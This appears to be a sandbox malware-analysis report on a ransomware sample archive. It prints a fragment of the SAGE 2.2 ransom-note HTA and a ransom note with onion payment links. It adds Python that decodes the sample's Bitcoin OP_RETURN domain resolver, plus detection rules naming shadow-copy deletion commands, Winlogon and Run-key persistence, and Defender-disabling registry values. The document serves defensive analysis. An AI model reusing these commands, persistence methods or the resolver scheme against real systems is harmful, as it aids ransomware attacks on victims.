el.innerHTML = html; }); }); return false; } function onPageLoaded(){ try{ tweakClass('lsb', show); }catch(e){} try{ tweakClass('lu-orig', show); }catch(e){} try{ setLang('en'); }catch(e){} try{ var args = GetCmd().match(/"[^"]+"|[^ ]+/g); if(args.length > 1){ var file = args[args.length-1]; if(file.charAt(0) == '"' && file.charAt(file.length-1) == '"') file = file.substr(1, file.length-2); document.getElementById('filename').innerHTML = file; show(document.getElementById('file')); document.title = 'File is encrypted'; } }catch(e){} } </script> </head> <body onload='javascript:onPageLoaded()'> <div class='lsb'> <span class='ls ls-en' onclick="javascript:return setLang('en')">English</span> <span class='ls ls-de' onclick="javascript:return setLang('de')">Deutsch</span> <span class='ls ls-it' onclick="javascript:return setLang('it')">Italiano</span> <span class='ls ls-fr' onclick="javascript:return setLang('fr')">Français</span> <span class='ls ls-es' onclick="javascript:return setLang('es')">Español</span> <span class='ls ls-no' onclick="javascript:return setLang('no')">Norsk</span> <span class='ls ls-pt' onclick="javascript:return setLang('pt')">Português</span> <span class='ls ls-nl' onclick="javascript:return setLang('nl')">Nederlands</span> <br/><span class='ls ls-kr' onclick="javascript:return setLang('kr')">한국어</span> <span class='ls ls-ms' onclick="javascript:return setLang('ms')">Bahasa Melayu</span> <span class='ls ls-zh' onclick="javascript:return setLang('zh')">中文</span> <span class='ls ls-tr' onclick="javascript:return setLang('tr')">Türkçe</span> <span class='ls ls-vi' onclick="javascript:return setLang('vi')">Tiếng Việt</span> <span class='ls ls-hi' onclick="javascript:return setLang('hi')">हिन्दी</span> <span class='ls ls-jv' onclick="javascript:return setLang('jv')">Basa Jawa</span> <span class='ls ls-fa' onclick="javascript:return setLang('fa')">فارسی</span> <span class='ls ls-ar' onclick="javascript:return setLang('ar')">العربية</span> </div> <div 
id='file' class='container filecontainer'> <div class='filename'> <div style='float:left; padding:18px 0'><img src="data:image/png;base64,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" style='padding:0 7.5px'/></div> <div> <h2 class='l l-en' style='display:block'>The file is encrypted but can be restored</h2><h2 class='l l-de' >Die Datei ist verschlüsselt, aber kann wiederhergestellt werden</h2><h2 class='l l-it' >Il file è crittografato, ma può essere ripristinato</h2><h2 class='l l-fr' >Le fichier est crypté mais peut être restauré</h2><h2 class='l l-es' >El archivo está encriptado pero puede ser restaurado</h2><h2 class='l l-no' >Filen er kryptert men kan bli gjenopprettet</h2><h2 class='l l-pt' >O arquivo está criptografado, mas poderá ser descriptografado</h2><h2 class='l l-nl' >Het bestand is versleuteld maar kan worden hersteld</h2><h2 class='l l-kr' >파일은 암호화되었지만 복원 할 수 있습니다</h2><h2 class='l l-ms' >Fail ini dienkripsikan tetapi boleh dipulih semula.</h2><h2 class='l l-zh' >文件已被加密,但是可以解密</h2><h2 class='l l-tr' >Dosya şifrelenmiş ancak geri yüklenebilir.</h2><h2 class='l l-vi' >Tập tin bị mã hóa nhưng có thể được khôi phục</h2><h2 class='l l-hi' >फाइल एनक्रिप्‍टड हैं लेकिन रिस्‍टोर की जा सकती हैं</h2><h2 class='l l-jv' >File ini dienkripsi tetapi dapat dikembalikan</h2><h2 class='l l-fa' >این فایل رمزگذاری شده است اما می تواند بازیابی شود</h2><h2 class='l l-ar' > الملف مشفر لكن من الممكن إسترجاعه </h2> <p><span id='filename'></span></p> </div> </div> <h2 class='l l-en' style='display:block'>The file you tried to open and other important files on your computer were encrypted by "SAGE 2.2 Ransomware".</h2><h2 class='l l-de' >Die Datei, die Sie öffnen wollten, und andere wichtige Dateien auf ihrem Computer wurden von "SAGE 2.2 Ransomware" verschlüsselt.</h2><h2 class='l l-it' >Il file che hai tentato di aprire e altri file importanti del tuo computer sono stati crittografati da "SAGE 2.2 Ransomware".</h2><h2 class='l l-fr' > Le fichier que vous essayez 
d’ouvrir et d’autres fichiers importants sur votre ordinateur ont été cryptés par "SAGE 2.2 Ransomware".</h2><h2 class='l l-es' >El archivo que intentó abrir y otros importantes archivos en su computadora fueron encriptados por "SAGE 2.2 Ransomware".</h2><h2 class='l l-no' >Filen du prøvde åpne og andre viktige filer på datamaskinen din ble kryptert av "SAGE 2.2 Ransomware".</h2><h2 class='l l-pt' >O arquivo que você está tentando acessar está criptografado, outros arquivos importantes em seu computador também foram criptografados por "SAGE 2.2 Ransomware".</h2><h2 class='l l-nl' >Het bestand dat je probeert te openen en andere belangrijke bestanden op je computer zijn beveiliged door "SAGE 2.2 Ransomware".</h2><h2 class='l l-kr' >컴퓨터에서 여는 파일 및 기타 중요한 파일은 "SAGE 2.2 Ransomware"에 의해 암호화되었습니다.</h2><h2 class='l l-ms' >Fail yang anda cuba buka dan fail penting yang lain di komputer anda telah dienkripskan oleh "SAGE 2.2 Ransomware".</h2><h2 class='l l-zh' >您试图打开的文件以及您计算机上的其它文件已经用"SAGE 2.2 Ransomware"进行了加密。</h2><h2 class='l l-tr' >Açmaya çalıştığınız dosya ve diğer önemli dosyalarınızı bilgisayarınızda "SAGE 2.2 Ransomware" tarafından şifrelenmiş.</h2><h2 class='l l-vi' >Tập tin mà bạn cố mở và những tập tin quan trọng khác trên máy tính của bạn bị mã hóa bởi "SAGE 2.2 Ransomware".</h2><h2 class='l l-hi' >वो फाइल जिसे आपने खोलने की कोशिश की और आपके कंप्‍यूटर पर बाकी महत्‍वपूर्ण फाइले हमारी ओर से इंक्रिप्टिड की गई हैं "SAGE 2.2 Ransomware"।</h2><h2 class='l l-jv' >File yang Anda coba untuk buka dan file penting lain di komputer Anda yang dienkripsi oleh "SAGE 2.2 Ransomware".</h2><h2 class='l l-fa' >فایلی که ش�
URLs

http://'+s.bp

http://'+s.bp+s.txp+tx
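
The two "URLs" the sandbox lists above are JavaScript string-concatenation fragments (`'http://'+s.bp`) pulled out of the HTA's script, not hosts the sample contacted. What that script actually does is the interesting part: it queries several public Bitcoin block explorers for transactions of a hard-coded address, takes the first transaction with an `OP_RETURN` output, and runs the hex through `decodeTxString()`, a chained XOR seeded with 0xAA, to obtain a `:`-separated list of domain suffixes, which `updateLinks()` appends to `z5dq36kjy5swjtmr.` to build the payment-portal links. The Python below is an added example written for this page, not code from the sample or from the sandbox. It ports that decoder, adds the inverse so a test vector can be built offline, and mirrors the note's `ptx()` check that only an output whose script asm starts with `OP_RETURN ` is used. The suffixes `example.net:example.org` and the hex derived from them are constructed for the example, not data from the sample's real transaction.

```python
"""Decoder for the OP_RETURN dead-drop resolver in the SAGE 2.2 HTA note.

decodeTxString() in the note reads the hex two nibbles at a time and XORs
each byte into an accumulator seeded with 0xAA, emitting the accumulator as
the next character. Plaintext byte i is therefore
    p[i] = p[i-1] XOR c[i]   with p[-1] = 0xAA
so the inverse is c[i] = p[i-1] XOR p[i]. The decoded text is a
':'-separated list of domain suffixes appended to the hard-coded hostname.
"""
from __future__ import annotations

IV = 0xAA                         # accumulator seed used by the note's decoder
OP_RETURN_PREFIX = "OP_RETURN "   # 10 characters; the note does substr(10)
HOSTNAME = "z5dq36kjy5swjtmr"     # hostname prefix from the note's updateLinks()


def decode_tx_string(hex_payload: str) -> str:
    """Port of decodeTxString(). Unlike the JS, which silently treats a
    dangling nibble as a full byte, odd-length or non-hex input is rejected."""
    data = bytes.fromhex(hex_payload.lower())   # ValueError on bad input
    acc = IV
    out = []
    for byte in data:
        acc ^= byte
        out.append(chr(acc))
    return "".join(out)


def encode_tx_string(plaintext: str) -> str:
    """Inverse of decode_tx_string(); used here only to build test data."""
    acc = IV
    out = bytearray()
    for ch in plaintext:
        code = ord(ch)
        if code > 0xFF:
            raise ValueError("the decoder only produces single-byte characters")
        out.append(acc ^ code)
        acc = code
    return out.hex()


def suffixes_from_script_asm(asm: str) -> list[str] | None:
    """Mirror of the note's ptx(): only an output whose script asm starts
    with 'OP_RETURN ' is used; everything after the prefix is the payload."""
    if not asm.startswith(OP_RETURN_PREFIX):
        return None
    return decode_tx_string(asm[len(OP_RETURN_PREFIX):]).split(":")


def portal_urls(suffixes: list[str], hostname: str = HOSTNAME) -> list[str]:
    """Rebuild the links the HTA renders: http://<hostname>.<suffix>/"""
    return [f"http://{hostname}.{s}/" for s in suffixes]


# Constructed test vector (not the sample's real transaction data).
SAMPLE_SUFFIXES = "example.net:example.org"
SAMPLE_ASM = OP_RETURN_PREFIX + encode_tx_string(SAMPLE_SUFFIXES)


if __name__ == "__main__":
    print("payload asm:", SAMPLE_ASM)
    for url in portal_urls(suffixes_from_script_asm(SAMPLE_ASM) or []):
        print(url)
```

Because each output byte depends only on the previous plaintext byte, the scheme is obfuscation rather than encryption: a defender who has the transaction can recover the live portal domains with no key, and the `1783wBGsr1zkxenfEELXA25PLSkLdfJ4B7` address and the `OP_RETURN` prefix are the stable indicators to watch.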

Extracted

Path

C:\XK\Restore-My-Files.txt

Ransom Note
All your files are Encrypted! For data recovery needs decryptor. How to buy decryptor: ---------------------------------------------------------------------------------------- | 1. Download Tor browser - https://www.torproject.org/ and install it. | 2. Open link in TOR browser - hhttp://alcx6zctcmhmn3kx.onion/ | 3. Follow the instructions on this page ---------------------------------------------------------------------------------------- Note! This link is available via "Tor Browser" only. ------------------------------------------------------------ Free decryption as guarantee. Before paying you can send us 2 file for free decryption. ------------------------------------------------------------ alternate address - http://dtutgqjuzv7sktgl.onion/ DO NOT CHANGE DATA BELOW ###h7dlrwhrvtghr###����������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�������������
URLs

http://dtutgqjuzv7sktgl.onion/

Targets

    • Target

      RNSM00361.7z

    • Size

      22.0MB

    • MD5

      178c5959b76748b2dc7b8375d12db80e

    • SHA1

      f292fe20d20524d7d9ac5658f35c4b85bea72112

    • SHA256

      f526608a5b27e9f3b290011efc5ed2098a48cbb522d15f7788dcda4158a23f49

    • SHA512

      9dc3274909bb0d6a39da8008d9c72ded281581f8ceab4e667670cf8e29fe5fca173ea7a2f53d1a34effeceac0105029202f83d83a1ecb1a548009aa81c4f18c0

    • SSDEEP

      393216:uM1EMy1RIPjtv22c20MTko/jMbyQ4kFnsMXzoBzapYxt3Ld:uQPyPI5vvc2ZuQkqMM9a+h

    • Azorult

      An information stealer that was first discovered in 2016, targeting browsing history and passwords.

    • Azorult family

    • Dharma

      Dharma (a CrySIS variant) is a ransomware family whose operators have been observed installing legitimate security software during an intrusion to mask their activity.

    • Dharma family

    • GandCrab payload

    • Gandcrab

      GandCrab is a ransomware-as-a-service family that encrypts files on the infected computer.

    • Gandcrab family

    • GlobeImposter

      GlobeImposter is a ransomware first seen in 2017.

    • Globeimposter family

    • HawkEye

      HawkEye is a malware kit that has seen continuous development since at least 2013.

    • Hawkeye family

    • Matrix Ransomware

      Targeted ransomware with information collection and encryption functionality.

    • Matrix family

    • Modifies WinLogon for persistence

    • Modifies Windows Defender Real-time Protection settings

    • Modifies visibility of file extensions in Explorer

    • Modifies visibility of hidden/system files in Explorer

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Troldesh family

    • Troldesh, Shade, Encoder.858

      Troldesh is a ransomware spread by malspam.

    • Windows security bypass

    • Contacts a large (7734) amount of remote hosts

      This may indicate a network scan to discover remotely running services.

    • Creates a large amount of network flows

      This may indicate a network scan to discover remotely running services.

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Renames multiple (292) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Blocklisted process makes network request

    • Disables RegEdit via registry modification

    • Disables use of System Restore points

    • Drops file in Drivers directory

    • Checks computer location settings

      Looks up the country code configured in the registry, likely a geofence check.

    • Credentials from Password Stores: Windows Credential Manager

      Suspicious access to Credentials History.

    • Drops startup file

    • Executes dropped EXE

    • Loads dropped DLL

    • Modifies system executable filetype association

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Uses the VBS compiler for execution

    • Windows security modification

    • Adds Run key to start application

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Drops desktop.ini file(s)

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Legitimate hosting services abused for malware hosting/C2

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Maps connected drives based on registry

      Disk information is often read in order to detect sandboxing environments.

    • Network Service Discovery

      Attempts to gather information on the host's network.

    • Network Share Discovery

      Attempts to gather information on the host's network.

    • Drops file in System32 directory

    • Sets desktop wallpaper using registry

    • Suspicious use of SetThreadContext

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.
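
The behaviours flagged above are what a host-based detection keys on. As an added example, not part of the sandbox report, the Python below runs a small rule set over constructed process-creation and registry-set events in a simple `kind|image|details` line format and reports which of the listed signatures fire. The registry paths and command lines in the rules are the ones these behaviours commonly take (`vssadmin`/`wmic` for shadow copies, the Winlogon `Shell`/`Userinit` values, Defender's Real-Time Protection policy values, `DisableRegistryTools`, the `Run` key, the `Control Panel\Desktop\Wallpaper` value, `SystemRestore\DisableSR`); they are assumptions for the example, not values extracted from this sample, and the `payload.exe` path and every event line are constructed. The Winlogon rule includes the check a practitioner wants: the stock `Shell=explorer.exe` is not flagged, only a value that appends something to it.

```python
"""Rule-based triage of constructed host events for the behaviours listed
above. Event lines use the format  kind|image|details  where kind is
'process' (details = command line) or 'registry' (details = key\\value=data).
Registry paths and command lines in RULES are the usual ones for each
behaviour, assumed for this example rather than extracted from the sample.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str      # "process" or "registry"
    image: str     # image path of the process that did it
    details: str   # command line, or "<key>\<value>=<data>"


# (signature name, event kind, pattern that fires, pattern that suppresses)
RULES = [
    ("Deletes shadow copies", "process",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
     None),
    ("Disables use of System Restore points", "registry",
     re.compile(r"\\Windows NT\\SystemRestore\\DisableSR=1$", re.I), None),
    ("Modifies WinLogon for persistence", "registry",
     re.compile(r"\\CurrentVersion\\Winlogon\\(Shell|Userinit)=", re.I),
     # the stock values are not persistence; only additions to them are
     re.compile(r"Winlogon\\Shell=explorer\.exe$"
                r"|Winlogon\\Userinit=C:\\Windows\\system32\\userinit\.exe,?$", re.I)),
    ("Modifies Windows Defender Real-time Protection settings", "registry",
     re.compile(r"\\Windows Defender\\Real-Time Protection\\Disable\w+=1$", re.I), None),
    ("Disables RegEdit via registry modification", "registry",
     re.compile(r"\\Policies\\System\\DisableRegistryTools=1$", re.I), None),
    ("Adds Run key to start application", "registry",
     re.compile(r"\\CurrentVersion\\Run\\[^\\=]+=", re.I), None),
    ("Sets desktop wallpaper using registry", "registry",
     re.compile(r"\\Control Panel\\Desktop\\Wallpaper=", re.I), None),
]


def parse_event(line: str) -> Event:
    kind, image, details = line.split("|", 2)
    return Event(kind, image, details)


def match_rules(ev: Event) -> list[str]:
    """Names of the signatures this single event triggers."""
    hits = []
    for name, kind, fire, suppress in RULES:
        if ev.kind != kind or not fire.search(ev.details):
            continue
        if suppress is not None and suppress.search(ev.details):
            continue
        hits.append(name)
    return hits


def triage(lines: list[str]) -> dict[str, list[str]]:
    """Map each signature that fired to the images responsible, in event order."""
    report: dict[str, list[str]] = {}
    for line in lines:
        ev = parse_event(line)
        for name in match_rules(ev):
            report.setdefault(name, []).append(ev.image)
    return report


PAYLOAD = r"C:\Users\Admin\AppData\Roaming\payload.exe"   # constructed path

# Constructed events; the last two are benign and must not fire.
SAMPLE_EVENTS = [
    r"process|C:\Windows\System32\cmd.exe|cmd.exe /c vssadmin delete shadows /all /quiet",
    f"registry|{PAYLOAD}|" + r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell=explorer.exe, " + PAYLOAD,
    f"registry|{PAYLOAD}|" + r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring=1",
    f"registry|{PAYLOAD}|" + r"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools=1",
    f"registry|{PAYLOAD}|" + r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater=" + PAYLOAD,
    f"registry|{PAYLOAD}|" + r"HKCU\Control Panel\Desktop\Wallpaper=C:\Users\Admin\AppData\Roaming\wall.bmp",
    r"registry|C:\Windows\explorer.exe|HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell=explorer.exe",
    r"process|C:\Windows\System32\notepad.exe|notepad.exe C:\XK\Restore-My-Files.txt",
]


if __name__ == "__main__":
    for name, images in triage(SAMPLE_EVENTS).items():
        print(f"{name}: {', '.join(images)}")
```

Keying rules on the written value rather than only on the key path is what keeps the Winlogon and Run-key rules useful on a real host, where those keys are also touched by installers and Group Policy; in production the same rules would be fed from Sysmon event IDs 1 and 13 rather than the toy line format used here.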

MITRE ATT&CK Enterprise v15

Tasks